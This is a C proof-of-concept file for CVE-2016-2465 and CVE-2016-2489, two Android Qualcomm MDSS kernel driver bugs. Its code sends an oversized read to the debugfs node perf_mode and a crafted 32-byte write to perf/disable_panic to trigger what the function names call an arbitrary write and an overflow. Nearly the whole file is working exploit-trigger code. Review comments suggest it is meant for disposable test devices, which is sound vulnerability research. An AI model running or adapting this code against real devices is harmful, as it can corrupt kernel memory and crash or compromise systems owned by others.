CVE-2016-2465-AND-CVE-2016-2489.c
/**
*
* CVE-2016-2465 And CVE-2016-2489.c
* https://code.google.com/p/android/issues/detail?id=201497
*
*
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
/**
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#777
*
*/
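/**
 * Issue a single oversized read() against the MDSS debugfs node
 * /sys/kernel/debug/mdp/perf_mode.
 *
 * The request length (0x655350 bytes) is backed by an anonymous private
 * mapping of the same size, so the user-space side of the call is always a
 * valid buffer. The function name and the mdss_debug.c reference above
 * suggest the point is to hand the node's read handler a count far larger
 * than what it produces; the kernel handler itself is not part of this file.
 *
 * NOTE(review): the node lives under debugfs, so the caller presumably needs
 * debugfs mounted and permission to open it -- confirm on the target build.
 * Run only on a disposable test device.
 *
 * Exits with EXIT_FAILURE if the mapping cannot be created. A missing node or
 * a failed read is reported on stderr and is not fatal, so the caller can
 * tell "node absent or rejected the request" apart from "request went through".
 */
static void doMdssPerfModeReadArbWrite(void)
{
	/* One length for both the mapping and the read() request. */
	const size_t len = 0x655350;
	int fd = open("/sys/kernel/debug/mdp/perf_mode", O_RDONLY);
	/* Keep open()'s errno: mmap() below may overwrite it. */
	int open_errno = errno;
	void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
			 MAP_ANON | MAP_PRIVATE,
			 -1, 0);

	if (buf == MAP_FAILED) {
		printf("Failed to get some vaddr with %s\n", strerror(errno));
		if (fd >= 0) {
			close(fd);
		}
		exit(EXIT_FAILURE);
	}

	/* 0 is a valid descriptor; only a negative value means open() failed. */
	if (fd < 0) {
		fprintf(stderr, "open perf_mode: %s\n", strerror(open_errno));
	} else {
		ssize_t ret = read(fd, buf, len);

		if (ret < 0) {
			fprintf(stderr, "read perf_mode: %s\n", strerror(errno));
		}
		close(fd);
	}

	/* Release the scratch mapping instead of leaking it until exit. */
	munmap(buf, len);
}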
/**
*
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#880
*
*/
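/**
 * Issue a single 32-byte write() to the MDSS debugfs node
 * /sys/kernel/debug/mdp/perf/disable_panic.
 *
 * The payload is a 32-byte buffer whose first byte is 0x0A and whose
 * remaining bytes are zero. The function name and the mdss_debug.c reference
 * above suggest the node's write handler does not bound the copy by its own
 * buffer size; that handler is not part of this file.
 *
 * NOTE(review): the node lives under debugfs, so the caller presumably needs
 * debugfs mounted and permission to open it -- confirm on the target build.
 * Run only on a disposable test device.
 *
 * A missing node or a failed write is reported on stderr and is not fatal.
 */
static void doMdssPanicWriteOverflow(void)
{
	int fd = open("/sys/kernel/debug/mdp/perf/disable_panic", O_WRONLY);
	char ignore[32] = { 0xA };

	/* 0 is a valid descriptor; only a negative value means open() failed. */
	if (fd < 0) {
		fprintf(stderr, "open disable_panic: %s\n", strerror(errno));
		return;
	}

	ssize_t ret = write(fd, ignore, sizeof(ignore));

	if (ret < 0) {
		fprintf(stderr, "write disable_panic: %s\n", strerror(errno));
	}
	close(fd);
}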
/*
 * Entry point: runs the disable_panic write check first, then the perf_mode
 * read check, and reports success to the shell.
 */
int main(void)
{
	doMdssPanicWriteOverflow();
	doMdssPerfModeReadArbWrite();

	return 0;
}